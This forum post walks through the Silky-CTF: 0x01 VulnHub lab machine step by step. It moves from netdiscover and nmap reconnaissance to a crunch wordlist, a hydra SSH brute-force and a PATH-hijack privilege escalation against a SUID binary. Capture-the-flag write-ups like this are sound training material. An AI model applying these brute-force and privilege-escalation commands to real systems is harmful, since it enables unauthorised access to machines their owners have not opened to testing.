Hi TurkHackTeam family, today I'll show you how to solve the Silky-CTF: 0x01 vulnerable machine.
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn the machine's IP address, type:
Code:
sudo netdiscover
![HCefxM.jpg](https://i.resimyukle.xyz/HCefxM.jpg)
With this, we learned the IP address of our target.
![x3aPc8.jpg](https://i.resimyukle.xyz/x3aPc8.jpg)
To learn which ports are open with an Nmap scan, type:
Code:
nmap -A IP_ADDRESS
As you can see, ports 22 and 80 are open, and what is important here is robots.txt and notex.txt, which I highlighted in blue.
![aJyUOR.jpg](https://i.resimyukle.xyz/aJyUOR.jpg)
I understood there was a website because port 80 is open. When I go to the website, I can see that it is an Apache-based website.
![OM8MIy.jpg](https://i.resimyukle.xyz/OM8MIy.jpg)
First, I went to robots.txt, and it forwarded me to notex.txt. There is a text in German.
![HT3xRx.jpg](https://i.resimyukle.xyz/HT3xRx.jpg)
When we translate it, I see this message: "I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still."
![Ke8LcN.jpg](https://i.resimyukle.xyz/Ke8LcN.jpg)
Next, I went back to the website, looked at the source code, and found something in the "script.js" file.
![9G0QTO.jpg](https://i.resimyukle.xyz/9G0QTO.jpg)
As you can see, we found some values related to the password.
![zPN2yA.jpg](https://i.resimyukle.xyz/zPN2yA.jpg)
The "password's last 2 letters are missing" note gave us a hint.
I'll create a password list with the crunch tool.
Code:
crunch 7 7 -t s1lKy^% >> password.txt
I ran this in the terminal and the password list was created.
![M3bWQV.jpg](https://i.resimyukle.xyz/M3bWQV.jpg)
We'll brute-force the SSH service with the Hydra tool; type the following command in the terminal:
Code:
hydra -l silky -P password.txt IP_ADDRESS ssh
Now we have the password.
![PfcTxR.jpg](https://i.resimyukle.xyz/PfcTxR.jpg)
To connect over SSH, type:
Code:
ssh silky@IP_ADDRESS
![J37bP4.jpg](https://i.resimyukle.xyz/J37bP4.jpg)
I searched for SUID files, and the /usr/bin/sky file caught my eye.
Code:
/usr/bin/sky
I ran this and saw some German text and the word "root".
![abc2eJ.jpg](https://i.resimyukle.xyz/abc2eJ.jpg)
I already ran the whoami command.
![U0V0W8.jpg](https://i.resimyukle.xyz/U0V0W8.jpg)
![Hc614c.jpg](https://i.resimyukle.xyz/Hc614c.jpg)
To escalate to root, I'll use the PATH variable. For this:
Code:
# work in /tmp, the directory that is put first in PATH below
cd /tmp
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
In a kind of funny way, I didn't get root when typing "id".
Code:
cd /root
But when I typed the above command, I didn't get any permission errors and got my flag.
![SUMJax.jpg](https://i.resimyukle.xyz/SUMJax.jpg)
/Translation Club M3m0ry\